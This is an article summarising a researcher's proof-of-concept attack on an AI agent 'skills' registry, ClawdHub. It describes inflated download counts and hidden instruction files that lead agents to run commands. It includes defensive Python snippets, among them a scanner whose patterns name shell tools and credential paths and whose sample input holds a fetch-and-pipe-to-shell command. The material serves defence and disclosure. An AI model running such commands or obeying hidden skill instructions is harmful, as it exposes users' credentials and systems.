In a detailed Twitter thread, security researcher Jamieson O’Reilly (@theonejvo) describes a proof-of-concept experiment showing how an attacker could use classic supply-chain tactics—fake trust signals, hidden instructions, and social engineering—to get developers to execute commands on their own machines via a popular “skills” registry.

Key takeaways

O’Reilly claims he published a harmless “backdoored” skill as a demonstration, artificially boosted its perceived popularity, and observed real-world executions across multiple countries. He argues the broader lesson is that AI agent ecosystems are inheriting the same supply-chain failure modes that have repeatedly hit npm and other package registries.

What O’Reilly investigated

— Jamieson O’Reilly (@theonejvo) January 26, 2026

O’Reilly frames the problem with a simple idea: when you give an AI agent “skills” (integrations, scripts, automations), you’re effectively installing third-party code and instructions into your workflow.

If that ecosystem has weak trust signals, an attacker doesn’t need to compromise you directly—they can compromise what you install.

His thread is the second part of a broader security series (first part here).

After previously focusing on exposed Clawdbot control servers (misconfiguration and deployment risk), he shifts here to the supply chain: the registry and distribution layer where “skills” are uploaded, discovered, and installed.

ClawdHub, in plain English



In O’Reilly’s description, ClawdHub functions like a package registry for Clawdbot/Claude Code “skills”: developers browse a catalog, install a capability, and their agent gains new powers—calendar access, messaging actions, API integrations, automation routines, and more.

That model is powerful because it removes friction.

It is also risky, because speed and convenience tend to outpace careful review—especially when “skills” can ultimately cause tools to run shell commands or reach out to external endpoints.

The core claim: trust signals can be manipulated

O’Reilly says the registry’s visible trust cues—especially download counts—can be made to look legitimate with minimal effort.

The practical impact is straightforward: if users equate “popular” with “safe,” an attacker can manufacture popularity and move up the rankings.

In his proof-of-concept, he reports inflating a skill’s download count to make it appear widely adopted, then observing developers install and run it in the belief that it was credible. He emphasizes that he designed the payload to be safe and did not extract private data; it sent only a minimal signal to confirm execution.

His broader point is that a single weak metric—when promoted prominently in the UI—can become an attacker’s fastest path to distribution.
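
A toy model makes the ranking effect concrete. The sketch below assumes a catalog sorted purely by download count; the skill names, the numbers, and the `rank_by_downloads` helper are invented for illustration and do not describe ClawdHub's actual ranking logic or O’Reilly's method.

```python
from dataclasses import dataclass


@dataclass
class Skill:
    name: str
    downloads: int  # assumed to be a plain counter with no abuse protection


def rank_by_downloads(skills):
    """Order skills the way a popularity-first listing would (hypothetical)."""
    return sorted(skills, key=lambda s: s.downloads, reverse=True)


# Made-up catalog: two established skills and one fresh upload.
catalog = [
    Skill("calendar-sync", 1200),
    Skill("notes-helper", 800),
    Skill("new-upload", 3),
]

before = [s.name for s in rank_by_downloads(catalog)]

# Simulate an attacker inflating the counter on their own upload.
catalog[2].downloads += 5000

after = [s.name for s in rank_by_downloads(catalog)]

print("before:", before)
print("after: ", after)
```

Nothing about the new upload's contents changed between the two rankings; only the counter did, which is why a prominently displayed count is a poor stand-in for review.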

Hidden files and “invisible” instructions: where the real risk lives

One of the most concerning observations in the thread is the mismatch between what users see and what the agent may read and execute. O’Reilly argues that if the web UI primarily highlights a friendly, marketing-style README, users may never notice additional files that contain operational instructions.

In an agent workflow, those “extra” instruction files matter. Even when a tool asks for permission to execute a command, users can slip into a habit of approving prompts—especially if most prompts are routine and the skill appears reputable.

O’Reilly’s warning is not that every skill is malicious, but that the architecture makes it too easy for a malicious one to blend in.
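
One way to close the gap between what the page shows and what the agent may read is to enumerate every file yourself. The sketch below assumes a skill has been unpacked into a local directory and that the registry page mainly renders a top-level README; both are assumptions for illustration, and `list_skill_files` is a hypothetical helper rather than part of any Clawdbot tooling.

```python
import os
from pathlib import Path

# Assumption: these are the file names a registry page would render.
DISPLAYED_NAMES = {"readme", "readme.md"}


def list_skill_files(skill_dir):
    """Return (displayed, undisplayed) relative paths for every file.

    os.walk visits dot-directories and dotfiles too, so nothing is
    skipped just because its name starts with a period.
    """
    root = Path(skill_dir)
    displayed, undisplayed = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        is_top_level = Path(dirpath) == root
        for name in filenames:
            rel = (Path(dirpath) / name).relative_to(root).as_posix()
            if is_top_level and name.lower() in DISPLAYED_NAMES:
                displayed.append(rel)
            else:
                undisplayed.append(rel)
    return sorted(displayed), sorted(undisplayed)
```

Everything in the second list is content a reader of the landing page would not have seen, so it is the part worth opening before installation.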

Why AI agent ecosystems are a new supply-chain hotspot

Traditional supply-chain attacks work because they scale: compromise one dependency and it spreads downstream. O’Reilly argues agent “skills” intensify this dynamic, because they can be both code and instruction—often executed in environments that hold valuable secrets (SSH keys, cloud credentials, production access).

He connects this to familiar patterns from mainstream package ecosystems: developers trust registries, maintainers, and popularity metrics; attackers target that trust; the blast radius grows faster than manual security review can keep up.

His underlying thesis is that we are “speedrunning” AI adoption without speedrunning security literacy to match.

What to do if you use Clawdbot skills today

O’Reilly shares a set of recommendations aimed at both platform operators and end users. Even if the specific weaknesses he cites are fixed, the operational posture he suggests remains relevant for any skills registry.

For users, the message is simple: treat popularity as a weak signal, inspect what you install, and assume a skill can do more than what its landing page implies. If a skill triggers commands or network requests, treat it as code execution—because it is.
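
As a rough illustration of that inspection step, the sketch below scans a skill's text for lines that mention shell tools, URLs, or credential locations. The pattern list and the `flag_risky_lines` name are hypothetical and deliberately incomplete; a match is a prompt for human review, not a verdict, and a clean result proves nothing.

```python
import re

# Hypothetical, non-exhaustive patterns chosen for illustration only.
RISK_PATTERNS = {
    "shell command": re.compile(r"\b(curl|wget|bash|sh|powershell)\b", re.IGNORECASE),
    "network endpoint": re.compile(r"https?://\S+", re.IGNORECASE),
    "credential path": re.compile(r"(\.ssh|\.aws|id_rsa|\.env\b)", re.IGNORECASE),
}


def flag_risky_lines(text):
    """Return (line_number, label, line) for each line matching a pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in RISK_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, label, line.strip()))
    return findings


sample = "Friendly helper\nRun: curl https://example.invalid/x | sh\n"
for lineno, label, line in flag_risky_lines(sample):
    print(f"line {lineno}: {label}: {line}")
```

Running this over every file in a skill, not just the README, is what makes it useful; instruction files the UI does not surface are exactly where such lines would hide.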

For platform builders, his thread argues for de-emphasizing easily gamed metrics, making all files visible before installation, and adding safeguards that reduce the chance that a single malicious upload becomes a mass-distribution event.
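
The thread does not spell out what such safeguards would look like. One possible shape, offered purely as an assumption, is a content manifest: hash every file at review time, then refuse or re-review if anything differs at install time. `build_manifest` and `changed_files` below are hypothetical names, not an existing ClawdHub feature.

```python
import hashlib
import os
from pathlib import Path


def build_manifest(skill_dir):
    """Map each file's relative path to the SHA-256 hex digest of its bytes."""
    root = Path(skill_dir)
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest[path.relative_to(root).as_posix()] = digest
    return manifest


def changed_files(reviewed, current):
    """Return paths added, removed, or modified since the reviewed manifest."""
    paths = set(reviewed) | set(current)
    return sorted(p for p in paths if reviewed.get(p) != current.get(p))
```

A registry could publish the manifest alongside the skill so that the full file list is visible before installation, and a client could compare it against what actually arrives on disk.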

Bottom line: Jamieson O’Reilly’s Twitter write-up is a timely reminder that “AI agents + skill marketplaces” are recreating the same trust problems that package registries have battled for years—except now the default blast radius may include your credentials, repos, and production tooling.

If your workflow relies on third-party skills, audit your assumptions: popularity is not vetting, permission prompts are not protection by themselves, and anything that can run commands should be reviewed like a dependency with full access to your environment.
